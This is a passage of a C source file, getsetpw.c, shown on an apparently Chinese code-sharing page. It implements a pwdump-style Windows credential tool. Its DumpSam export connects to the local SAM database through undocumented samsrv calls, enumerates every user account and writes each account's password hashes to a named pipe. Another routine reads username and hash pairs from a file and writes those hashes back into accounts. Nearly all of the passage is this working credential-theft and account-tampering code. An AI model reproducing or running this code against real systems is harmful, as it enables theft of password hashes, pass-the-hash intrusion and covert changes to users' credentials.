📄 getsetpw.c
字号:
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
continue;
}
// initialize everything to zeros
ZeroMemory(pwd, sizeof (pwd));
ZeroMemory(user, sizeof (user));
ZeroMemory(hash, sizeof (hash));
ZeroMemory(wuser, sizeof (wuser));
// first, copy the username out of the data
strncpy(user, data, pos - data);
// convert username to Unicode
MultiByteToWideChar(CP_ACP, 0, user, -1, wuser, sizeof (wuser));
// then, copy the password hash out
strcpy(hash, pos + 1);
// now, lookup the user on the local computer
NetErr = NetUserGetInfo(NULL, wuser, 3, (LPBYTE*) &ui3);
if (NetErr)
{
_snprintf (szBuffer, sizeof (szBuffer), "Unable to retrieve user information for %S : Error = %d\n", wuser, NetErr);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
continue;
}
// save RID for later
RID = ui3->usri3_user_id;
// free memory from NetUserGetInfo call
NetApiBufferFree(ui3);
// now we convert the password hash back into binary; yes, there is probably a better
// and fancier way to do this, but I wanted to be clear and safe
HashIndex = 0;
for (i=0; i < 32; i++)
{
PwdByte[0] = hash[HashIndex];
PwdByte[1] = hash[HashIndex + 1];
PwdByte[2] = '\0';
intTemp = strtoul(PwdByte, &stopstring, 16); //base 16 (hex)
pwd[i] = intTemp;
HashIndex = HashIndex + 2;
}
// now get the target user, based on the RID of the user
rc = pSamrOpenUser (hDomain, MAXIMUM_ALLOWED, RID, &hUser);
if (rc < 0)
{
_snprintf (szBuffer, sizeof (szBuffer), "SamrOpenUser for %S failed : 0x%08X\n", wuser, rc);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
continue;
}
// and finally put the hash back into the user
rc = pSamrSetInformationUser (hUser, SAM_USER_INFO_PASSWORD_OWFS, pwd);
pSamrCloseHandle (&hUser);
if (rc < 0)
{
_snprintf (szBuffer, sizeof (szBuffer), "SamrSetInformationUser for %S failed : 0x%08X\n", wuser, rc);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
}
else
{
// WARNING: THIS DOES NOT WORK ! In our testing, trying to set this flag
// resulted in a reboot of the server.
//ui3->usri3_password_expired = 0; // 1 will force a password change
//NetErr = NetUserSetInfo(NULL, wuser, 3, (LPBYTE) &ui3, NULL);
_snprintf (szBuffer, sizeof (szBuffer), "Set password for user %S\n", wuser);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
}
}
fclose(stream);
}
else
{
_snprintf (szBuffer, sizeof (szBuffer), "Unable to open input file %s", InputFile);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
goto exit;
}
theRc = 0;
exit:
if (hDomain)
pSamrCloseHandle (&hDomain);
if (hSam)
pSamrCloseHandle (&hSam);
if (lsaHandle)
LsaClose (lsaHandle);
if (hPipe)
{
FlushFileBuffers (hPipe);
CloseHandle (hPipe);
}
if (hSamsrv)
FreeLibrary (hSamsrv);
return theRc;
}
// Dump the SAM contents to a file.
int __declspec(dllexport) DumpSam (char *szPipeName, char *szCurrentDirectory)
{
int i;
HANDLE hPipe;
LSA_OBJECT_ATTRIBUTES objAttrib;
LSA_HANDLE lsaHandle = 0;
PLSA_UNICODE_STRING pSystemName = NULL;
POLICY_ACCOUNT_DOMAIN_INFO* pDomainInfo;
NTSTATUS rc, enum_rc;
TCHAR szBuffer[300];
HSAM hSam = 0;
HDOMAIN hDomain = 0;
HUSER hUser = 0;
DWORD dwEnum = 0;
DWORD dwNumRet;
SAM_USER_ENUM *pEnum = NULL;
PVOID pUserInfo = 0;
int theRc = 1; // set to fail initially
// Open the output pipe
hPipe = CreateFile (szPipeName, GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, FILE_FLAG_WRITE_THROUGH, NULL);
if (hPipe == INVALID_HANDLE_VALUE)
{
_snprintf (szBuffer, sizeof (szBuffer), "Failed to open output pipe(%s): %d\n",
szPipeName, GetLastError ());
OutputDebugString (szBuffer);
goto exit;
}
if (!LoadFunctions ())
{
SendText (hPipe, "Failed to load functions\n");
goto exit;
}
// Open the Policy database
memset (&objAttrib, 0, sizeof (objAttrib));
objAttrib.Length = sizeof (objAttrib);
rc = LsaOpenPolicy (pSystemName, &objAttrib, POLICY_ALL_ACCESS, &lsaHandle);
if (rc < 0)
{
_snprintf (szBuffer, sizeof (szBuffer), "LsaOpenPolicy failed : 0x%08X", rc);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
goto exit;
}
rc = LsaQueryInformationPolicy (lsaHandle, PolicyAccountDomainInformation, &pDomainInfo);
if (rc < 0)
{
_snprintf (szBuffer, sizeof (szBuffer), "LsaQueryInformationPolicy failed : 0x%08X", rc);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
goto exit;
}
// Connect to the SAM database
rc = pSamIConnect (0, &hSam, MAXIMUM_ALLOWED, 1);
if (rc < 0)
{
_snprintf (szBuffer, sizeof (szBuffer), "SamConnect failed : 0x%08X", rc);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
goto exit;
}
rc = pSamrOpenDomain (hSam, 0xf07ff, pDomainInfo->DomainSid, &hDomain);
if (rc < 0)
{
_snprintf (szBuffer, sizeof (szBuffer), "SamOpenDomain failed : 0x%08X\n", rc);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
hDomain = 0;
goto exit;
}
do
{
enum_rc = pSamrEnumerateUsersInDomain (hDomain, &dwEnum, 0, &pEnum, 1000, &dwNumRet);
if (enum_rc == 0 || enum_rc == 0x105)
{
for (i=0; i<(int)dwNumRet; i++)
{
CHAR szUserName[256];
wchar_t wBuff[256];
DWORD dwSize;
// Open the user (by Rid)
rc = pSamrOpenUser (hDomain, MAXIMUM_ALLOWED, pEnum->users[i].rid, &hUser);
if (rc < 0)
{
_snprintf (szBuffer, sizeof (szBuffer),
"SamrOpenUser(0x%x) failed : 0x%08X\n",
pEnum->users[i].rid, rc);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
continue;
}
// Get the password OWFs
rc = pSamrQueryInformationUser (hUser, SAM_USER_INFO_PASSWORD_OWFS, &pUserInfo);
if (rc < 0)
{
_snprintf (szBuffer, sizeof (szBuffer), "SamrQueryInformationUser failed : 0x%08X\n", rc);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
pSamrCloseHandle (&hUser);
hUser = 0;
continue;
}
// Convert the username
dwSize = min ((sizeof (wBuff)/sizeof(wchar_t))-1, pEnum->users[i].name.Length/2);
wcsncpy (wBuff, pEnum->users[i].name.Buffer, dwSize);
wBuff[dwSize] = L'\0';
WideCharToMultiByte (CP_ACP, 0, wBuff, -1, szUserName, sizeof (szUserName), 0, 0);
szUserName[sizeof (szUserName) -1] = '\0';
DumpInfo (hPipe, szUserName, pUserInfo);
// Free stuff
pSamIFree_SAMPR_USER_INFO_BUFFER (pUserInfo, SAM_USER_INFO_PASSWORD_OWFS);
pUserInfo = 0;
pSamrCloseHandle (&hUser);
hUser = 0;
}
pSamIFree_SAMPR_ENUMERATION_BUFFER (pEnum);
pEnum = NULL;
}
else
{
_snprintf (szBuffer, sizeof (szBuffer), "SamrEnumerateUsersInDomain failed : 0x%08X\n", enum_rc);
SendText (hPipe, szBuffer);
OutputDebugString (szBuffer);
}
}
while (enum_rc == 0x105);
theRc = 0;
exit:
// Clean up
if (hUser)
pSamrCloseHandle (&hUser);
if (hDomain)
pSamrCloseHandle (&hDomain);
if (hSam)
pSamrCloseHandle (&hSam);
if (lsaHandle)
LsaClose (lsaHandle);
if (hPipe)
{
FlushFileBuffers (hPipe);
CloseHandle (hPipe);
}
if (hSamsrv)
FreeLibrary (hSamsrv);
return theRc;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -